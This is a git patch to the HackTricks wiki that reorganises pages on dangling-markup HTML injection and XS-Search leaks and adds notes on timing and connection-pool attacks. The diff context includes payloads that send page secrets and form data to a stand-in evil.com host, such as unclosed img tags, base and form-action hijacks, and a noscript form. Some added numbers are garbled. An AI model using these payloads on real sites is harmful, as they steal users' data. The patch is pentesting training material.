From fde30b2141d70b0bc2ed0b178d06729a185d5b83 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Mon, 27 Jun 2022 17:09:07 +0000
Subject: [PATCH] GitBook: [#3287] No subject

---
 SUMMARY.md                                    |  6 +--
 .../pentesting-web/graphql.md                 |  2 +-
 ...ngling-markup-html-scriptless-injection.md | 50 +++++++++----------
 .../web-vulnerabilities-methodology.md        |  2 +-
 .../{xs-search.md => xs-search/README.md}     | 35 ++++++++++---
 .../README.md                                 |  0
 .../css-injection-code.md                     |  0
 7 files changed, 57 insertions(+), 38 deletions(-)
 rename pentesting-web/{xs-search.md => xs-search/README.md} (90%)
 rename pentesting-web/{dangling-markup-html-scriptless-injection => xs-search}/html-injection-char-by-char-exfiltration/README.md (100%)
 rename pentesting-web/{dangling-markup-html-scriptless-injection => xs-search}/html-injection-char-by-char-exfiltration/css-injection-code.md (100%)

diff --git a/SUMMARY.md b/SUMMARY.md
index 6136311a2..24a1364cc 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -434,8 +434,6 @@
 * [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md)
 * [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md)
 * [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md)
-  * [HTML Injection / Char-by-char Exfiltration](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md)
-    * [CSS Injection Code](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md)
 * [Deserialization](pentesting-web/deserialization/README.md)
   * [NodeJS - \_\_proto\_\_ & prototype Pollution](pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md)
     * [Client Side Prototype Pollution](pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md)
@@ -521,7 +519,9 @@
   * [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md)
   * [XSS in Markdown](pentesting-web/xss-cross-site-scripting/xss-in-markdown.md)
 * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
-* [XS-Search](pentesting-web/xs-search.md)
+* [XS-Search](pentesting-web/xs-search/README.md)
+  * [HTML Injection / Char-by-char Exfiltration](pentesting-web/xs-search/html-injection-char-by-char-exfiltration/README.md)
+    * [CSS Injection Code](pentesting-web/xs-search/html-injection-char-by-char-exfiltration/css-injection-code.md)
 
 ## ⛈ Cloud Security
 
diff --git a/network-services-pentesting/pentesting-web/graphql.md b/network-services-pentesting/pentesting-web/graphql.md
index c84bbff01..f33155a45 100644
--- a/network-services-pentesting/pentesting-web/graphql.md
+++ b/network-services-pentesting/pentesting-web/graphql.md
@@ -307,7 +307,7 @@ However, note that the new default cookie value of the `samesite` flag of Chrome
 
 Note that it's usually possible to send the **query** **request** also as a **GET** **request and the CSRF token might not being validated in a GET request.**
 
-Also, abusing a [**XS-Search**](../../pentesting-web/xs-search.md) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user.
+Also, abusing a [**XS-Search**](../../pentesting-web/xs-search/) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user.
 
 For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).
 
diff --git a/pentesting-web/dangling-markup-html-scriptless-injection.md b/pentesting-web/dangling-markup-html-scriptless-injection.md
index c5d3ef9bb..b377ba873 100644
--- a/pentesting-web/dangling-markup-html-scriptless-injection.md
+++ b/pentesting-web/dangling-markup-html-scriptless-injection.md
@@ -1,4 +1,4 @@
-
+# Dangling Markup - HTML scriptless injection
 
 <details>
 
@@ -16,17 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Resume
+## Resume
 
 This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.\
 It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
 
 Several techniques commented here can be used to bypass some [**Content Security Policy**](content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
 
-# Main Applications
+## Main Applications
 
-## Stealing clear text secrets
+### Stealing clear text secrets
 
 If you inject `<img src='http://evil.com/log.cgi?` when the page is loaded the victim will send you all the code between the injected `img` tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use).
 
@@ -60,7 +59,7 @@ You could also insert a `<base` tag. All the information will be sent until the
 steal me'<b>test</b>
 ```
 
-## Stealing forms
+### Stealing forms
 
 ```markup
 <base href='http://evil.com/'>
@@ -68,11 +67,11 @@ steal me'<b>test</b>
 
 Then, the forms that send data to path (like `<form action='update_profile.php'>`) will send the data to the malicious domain.
 
-## Stealing forms 2
+### Stealing forms 2
 
 Set a form header: `<form action='http://evil.com/log_steal'>` this will overwrite the next form header and all the data from the form will be sent to the attacker.
 
-## Stealing forms 3
+### Stealing forms 3
 
 The button can change the URL where the information of the form is going to be sent with the attribute "formaction":
 
@@ -82,7 +81,7 @@ The button can change the URL where the information of the form is going to be s
 
 An attacker can use this to steal the information.
 
-## Stealing clear text secrets 2
+### Stealing clear text secrets 2
 
 Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field:
 
@@ -98,7 +97,7 @@ You can do the same thing injecting a form and an `<option>` tag. All the data u
 <form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
 ```
 
-## Form parameter injection
+### Form parameter injection
 
 You can change the path of a form and insert new values so an unexpected action will be performed:
 
@@ -116,7 +115,7 @@ You can change the path of a form and insert new values so an unexpected action
 </form>
 ```
 
-## Stealing clear text secrets via noscript
+### Stealing clear text secrets via noscript
 
 `<noscript></noscript>` Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in [chrome://settings/content/javascript](chrome://settings/content/javascript)).
 
@@ -126,7 +125,7 @@ A way to exfiltrate the content of the web page from the point of injection to t
 <noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
 ```
 
-## Bypassing CSP with user interaction
+### Bypassing CSP with user interaction
 
 From this [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) you can learn that even from the **most CSP restricted** environments you can still **exfiltrate data** with some **user interaction**. In this occasion we are going to use the payload:
 
@@ -145,7 +144,7 @@ if(window.name) {
 </script>
 ```
 
-## Misleading script workflow 1 - HTML namespace attack
+### Misleading script workflow 1 - HTML namespace attack
 
 Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:
 
@@ -164,7 +163,7 @@ function submit_status_update() {
 }
 ```
 
-## Misleading script workflow 2 - Script namespace attack
+### Misleading script workflow 2 - Script namespace attack
 
 Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:
 
@@ -190,7 +189,7 @@ function submit_new_acls() {
 }
 ```
 
-## Abuse of JSONP
+### Abuse of JSONP
 
 If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:
 
@@ -212,7 +211,7 @@ Or you can even try to execute some javascript:
 <script src='/search?q=a&call=alert(1)'></script>
 ```
 
-## Iframe abuse
+### Iframe abuse
 
 Notice that a **child document can view and set location property for parent, even if cross-origin.** This means that you can make the client access any other page by loading inside an **iframe** some code like:
 
@@ -222,13 +221,13 @@ Notice that a **child document can view and set location property for parent, ev
 
 This can be mitigated with something like: _**sandbox=’ allow-scripts allow-top-navigation’**_
 
-## \<meta abuse
+### \<meta abuse
 
 You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
 
 This can be **avoided** with a **CSP** regarding **http-equiv** ( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`)
 
-## New \<portal HTML tag
+### New \<portal HTML tag
 
 You can find a very **interesting research** on exploitable vulnerabilities of the \<portal tag [here](https://research.securitum.com/security-analysis-of-portal-element/).\
 At the moment of this writing you need to enable the portal tag on Chrome in `chrome://flags/#enable-portals` or it won't work.
@@ -237,23 +236,23 @@ At the moment of this writing you need to enable the portal tag on Chrome in `ch
 <portal src='https://attacker-server?
 ```
 
-## HTML Leaks
+### HTML Leaks
 
 Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
 
-# Char-by-char Leaks
+## Char-by-char Leaks
 
 You can find techniques like **CSS injection or Lazy Load Images** explained in this post to **leak secrets from a HTML without JS execution char by char**:
 
-{% content-ref url="dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/" %}
-[html-injection-char-by-char-exfiltration](dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/)
+{% content-ref url="xs-search/html-injection-char-by-char-exfiltration/" %}
+[html-injection-char-by-char-exfiltration](xs-search/html-injection-char-by-char-exfiltration/)
 {% endcontent-ref %}
 
-# Brute-Force Detection List
+## Brute-Force Detection List
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
 
-# References
+## References
 
 All the techniques presented here and more can view reviewed with more details in:
 
@@ -267,7 +266,6 @@ More info:
 
 {% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -283,5 +281,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-
diff --git a/pentesting-web/web-vulnerabilities-methodology.md b/pentesting-web/web-vulnerabilities-methodology.md
index e0e4fb2ff..e21e0b842 100644
--- a/pentesting-web/web-vulnerabilities-methodology.md
+++ b/pentesting-web/web-vulnerabilities-methodology.md
@@ -57,7 +57,7 @@ If the introduced data may somehow being reflected in the response, the page mig
 * [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
 * [ ] [**XSS**](xss-cross-site-scripting/)
 * [ ] [**XSSI**](xssi-cross-site-script-inclusion.md)
-* [ ] [**XS-Search**](xs-search.md)
+* [ ] [**XS-Search**](xs-search/)
 
 Some of the mentioned vulnerabilities requires special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in:
 
diff --git a/pentesting-web/xs-search.md b/pentesting-web/xs-search/README.md
similarity index 90%
rename from pentesting-web/xs-search.md
rename to pentesting-web/xs-search/README.md
index 1475ed81c..65f374d32 100644
--- a/pentesting-web/xs-search.md
+++ b/pentesting-web/xs-search/README.md
@@ -20,7 +20,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 ## Time attack
 
-**\[Data Leak]**\
 **Measuring the time** of a response that search for info, it's possible to leak if the info exists.\
 For more info: [https://xsleaks.dev/docs/attacks/xs-search/](https://xsleaks.dev/docs/attacks/xs-search/)
 
@@ -30,6 +29,8 @@ There are a considerable number of APIs attackers can abuse to create implicit c
 
 ### Network Timing
 
+Network Timing is more significant than Execution Timing for pages with **more backend processing.**
+
 Several events can be timed using the mentioned clocks, such as requests, onload and unload events, cross-windows loads...\
 For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/)
 
@@ -44,6 +45,9 @@ For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/
 
 ### Execution Timing
 
+Execution Timing is more significant than Network Timing in applications processing and displaying data **within the browse**.\
+Note that in an execution timing it's possible to **eliminate** **network factors** to obtain **more precise measurements**. For example, an attacker could preload all of the subresources by embedding the page as an `iframe` (forcing the browser to cache the subresources) and then perform a second measurement, which excludes any delay introduced by the retrieval of those subresources.
+
 #### Timing the Event Loop <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
 
 JavaScript’s concurrency model is based on a [single-threaded event loop](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) which means **it can only run one task at a time**.\
@@ -69,7 +73,22 @@ For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing
 
 #### jQuery, CSS Selectors & Short-circuit Timing
 
-#### If `jQuery(location.hash)` sdf
+If `jQuery(location.hash)` is used, it's possible to find out via timing i**f some HTML content exists**, this is because if the selector `main[id='site-main']` doesn't match it doesn't need to check the rest of the **selectors**:
+
+```javascript
+$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']")
+```
+
+### Connection Pool
+
+Browsers use sockets to communicate with servers. As the operating system and the hardware it runs on have limited resources, **browsers have to impose a limit**. To exploit the existence of this limit, attackers can:
+
+1. Check what the limit of the browser is, for example 256 global sockets.
+2. Block 255255 sockets for a long period of time by performing 255255 requests to different hosts that simply hang the connection
+3. Use the 256^{th}256th socket by performing a request to the target page.
+4. Perform a 257^{th}257th request to another host. Since all the sockets are being used (in steps 2 and 3), this request must wait until the pool receives an available socket. This waiting period provides the attacker with the network timing of the 256^{th}256th socket, which belongs to the target page. This works because the 255255 sockets in step 2 are still blocked, so if the pool received an available socket, it was caused by the release of the socket in step 3. The time to release the 256^{th}256th socket is directly connected with the time taken to complete the request.
+
+For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
 
 ## Window References
 
@@ -81,6 +100,10 @@ For more info: [https://xsleaks.dev/docs/attacks/window-references/](https://xsl
 CSS can be used to trick a user into exposing information such as embedded pixel values by making visual changes that are affected by the embed. It could be also used to exfiltrate the history or autocomplete passwords.\
 For more info: [https://xsleaks.dev/docs/attacks/css-tricks/](https://xsleaks.dev/docs/attacks/css-tricks/)
 
+## CSS Injection
+
+
+
 ## Error Events
 
 When a webpage tries to load an URL if the response has an **error status an** [**error event**](https://developer.mozilla.org/en-US/docs/Web/API/Element/error\_event) **is fired**. This helps to find out things like for example if the current user had access to the requested data.\
@@ -119,7 +142,7 @@ For more info: [https://xsleaks.dev/docs/attacks/cache-probing/](https://xsleaks
 
 ### Timing
 
-You could use a [**timing technique**](xs-search.md#time-attack) to check if the resource was cached.
+You could use a [**timing technique**](./#time-attack) to check if the resource was cached.
 
 ### Error Events
 
@@ -139,7 +162,7 @@ For more info: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abort
 
 ### Performance API
 
-Using the [Performance API](xs-search.md#performance-api) it's possible to check if a resource is cached.\
+Using the [Performance API](./#performance-api) it's possible to check if a resource is cached.\
 For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources)
 
 ### Partitioned HTTP Cache Bypass <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
@@ -203,8 +226,8 @@ For more info: [https://xsleaks.dev/docs/attacks/postmessage-broadcasts/](https:
 
 ## CORB & CORP Leaks
 
-You can find [what is **CORP** in this page](../network-services-pentesting/pentesting-web/special-http-headers.md#corp).\
-You can find [what is **CORB** in this page](../network-services-pentesting/pentesting-web/special-http-headers.md#corp-1).
+You can find [what is **CORP** in this page](../../network-services-pentesting/pentesting-web/special-http-headers.md#corp).\
+You can find [what is **CORB** in this page](../../network-services-pentesting/pentesting-web/special-http-headers.md#corp-1).
 
 A page could leak if it's using these headers to protect in some specific cases.\
 For more info: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/) and [https://xsleaks.dev/docs/attacks/browser-features/corp/](https://xsleaks.dev/docs/attacks/browser-features/corp/)
diff --git a/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md b/pentesting-web/xs-search/html-injection-char-by-char-exfiltration/README.md
similarity index 100%
rename from pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md
rename to pentesting-web/xs-search/html-injection-char-by-char-exfiltration/README.md
diff --git a/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md b/pentesting-web/xs-search/html-injection-char-by-char-exfiltration/css-injection-code.md
similarity index 100%
rename from pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md
rename to pentesting-web/xs-search/html-injection-char-by-char-exfiltration/css-injection-code.md